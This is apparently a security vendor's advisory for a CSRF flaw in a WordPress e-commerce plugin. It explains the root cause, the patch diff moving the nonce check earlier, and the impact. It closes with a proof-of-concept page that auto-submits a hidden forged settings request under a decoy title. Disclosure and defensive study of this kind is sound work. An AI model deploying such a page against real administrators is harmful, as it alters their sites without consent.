Atomic Edge analysis of CVE-2026-1208:
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Friendly Functions for Welcart WordPress plugin versions 1.2.5 and earlier. The vulnerability exists in the plugin’s settings update functionality, allowing unauthenticated attackers to modify plugin configurations by tricking an administrator into submitting a malicious request. The CVSS score of 4.3 reflects a medium-severity attack that requires user interaction but has no authentication requirements.
Atomic Edge research identifies the root cause as missing nonce validation during the initial request processing in the settings page handler. The vulnerable code resides in the file `friendly-functions-for-welcart/ffw_function_settings.php`. Before the patch, the plugin only performed nonce validation inside the conditional block that checked for `$_POST[‘submit_settings’]` at line 54. This validation occurred after the plugin had already begun processing the request and loading option data. The security check used `check_admin_referer(‘ffw_settings_nonce’)` but its placement allowed the request to proceed without validation if the attacker crafted a specific payload.
The exploitation method involves an attacker creating a malicious web page or link that submits a forged POST request to the WordPress admin area where the plugin’s settings page is loaded. The target endpoint is the plugin’s settings page, typically accessed via the WordPress admin menu. The attacker crafts a request containing the `submit_settings` parameter along with other plugin configuration parameters they wish to modify. When an administrator with appropriate privileges visits the attacker’s page while authenticated to their WordPress site, the forged request executes, changing plugin settings without the administrator’s knowledge or consent.
The patch moves the nonce validation earlier in the execution flow. The fix adds a new security check at lines 9-14 in `ffw_function_settings.php` that executes before any plugin data processing begins. This new validation checks for the presence of `$_POST[‘submit_settings’]` and immediately validates the nonce using `check_admin_referer(‘ffw_settings_nonce’)`. If validation fails, the script terminates with `wp_die()`. The patch also removes the duplicate nonce check from lines 54-58, preventing any execution path that could bypass the security validation. The version number increments from 1.2.5 to 1.2.6 in the main plugin file.
Successful exploitation allows attackers to modify all plugin settings controlled through the settings interface. Depending on the plugin’s functionality, this could include changing e-commerce behaviors, modifying display settings, or altering integration parameters. While the vulnerability does not provide direct code execution or data extraction, unauthorized configuration changes could disrupt site functionality, affect user experience, or enable secondary attacks through misconfigured components. The impact is limited to the plugin’s configuration scope but could have business consequences for sites relying on Welcart e-commerce functionality.
--- a/friendly-functions-for-welcart/ffw_function_settings.php
+++ b/friendly-functions-for-welcart/ffw_function_settings.php
@@ -9,6 +9,12 @@
include_once(ABSPATH . 'wp-admin/includes/plugin.php');
if (is_plugin_active('usc-e-shop/usc-e-shop.php')):
+//Nonceチェック
+if(
+ isset($_POST['submit_settings']) &&
+ !check_admin_referer('ffw_settings_nonce')
+) wp_die(__('Security check failed', 'text-domain'));
+
/* 設定情報 */
//取得
$friendlyFunctionsForWelcartData = get_option('friendlyFunctionsForWelcartData');
@@ -54,10 +60,6 @@
//設定保存時のメッセージ
if(isset($_POST['submit_settings'])){
- //Nonceチェック
- if(!check_admin_referer('ffw_settings_nonce')){
- wp_die(__('Security check failed', 'text-domain'));
- }
$saveMessage = '<div class="saveMessage updated"><p>'.sprintf(esc_html__('%s saved.', MAINICHI_WEB_THIS_PLUGIN_NAME), sanitize_text_field($_POST['submit_settings'])).'</p></div>'; // ~を保存しました。
}
?>
--- a/friendly-functions-for-welcart/friendly-functions-for-welcart.php
+++ b/friendly-functions-for-welcart/friendly-functions-for-welcart.php
@@ -10,7 +10,7 @@
Requires PHP: 7.2
License: GPLv2 or later
License URI: https://www.gnu.org/licenses/gpl-2.0.html
-Version: 1.2.5
+Version: 1.2.6
*/
if(!defined('ABSPATH')) exit;
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1208 - Friendly Functions for Welcart <= 1.2.5 - Cross-Site Request Forgery to Settings Update
<?php
/**
* Proof of Concept for CVE-2026-1208
* CSRF against Friendly Functions for Welcart WordPress plugin <= 1.2.5
*
* This script generates an HTML page that submits a forged POST request
* to the vulnerable plugin's settings page when visited by an authenticated admin.
* The payload attempts to modify plugin settings via CSRF.
*/
// Configuration - Set the target WordPress admin URL
$target_url = 'https://vulnerable-site.com/wp-admin/admin.php?page=ffw_settings';
// Generate a unique form ID to avoid collisions
$form_id = uniqid('csrf_');
?>
<!DOCTYPE html>
<html>
<head>
<title>Document Preview</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; }
.hidden { display: none; }
.info { background: #f0f0f0; padding: 15px; border-radius: 5px; margin-bottom: 20px; }
</style>
</head>
<body>
<div class="info">
<h2>Atomic Edge CVE Research - Proof of Concept</h2>
<p><strong>CVE-2026-1208:</strong> Friendly Functions for Welcart CSRF to Settings Update</p>
<p>This page demonstrates a CSRF attack against vulnerable plugin versions (<=1.2.5).</p>
<p>When visited by an authenticated WordPress administrator, this page will automatically submit a forged request to modify plugin settings.</p>
<p><strong>Target URL:</strong> <?php echo htmlspecialchars($target_url); ?></p>
</div>
<form id="<?php echo $form_id; ?>" method="POST" action="<?php echo htmlspecialchars($target_url); ?>" class="hidden">
<!-- The submit_settings parameter triggers the settings save functionality -->
<input type="hidden" name="submit_settings" value="Settings" />
<!-- Example: Attempt to modify plugin configuration options -->
<!-- These parameter names would need to be determined from the actual plugin code -->
<input type="hidden" name="ffw_option_1" value="malicious_value_1" />
<input type="hidden" name="ffw_option_2" value="malicious_value_2" />
<input type="hidden" name="ffw_enable_feature" value="0" />
<!-- The nonce field is intentionally omitted to exploit the vulnerability -->
<!-- Vulnerable versions do not validate nonce presence before processing -->
</form>
<script>
// Auto-submit the form when the page loads
document.addEventListener('DOMContentLoaded', function() {
console.log('Atomic Edge PoC: Submitting CSRF payload to target...');
document.getElementById('<?php echo $form_id; ?>').submit();
});
</script>
</body>
</html>
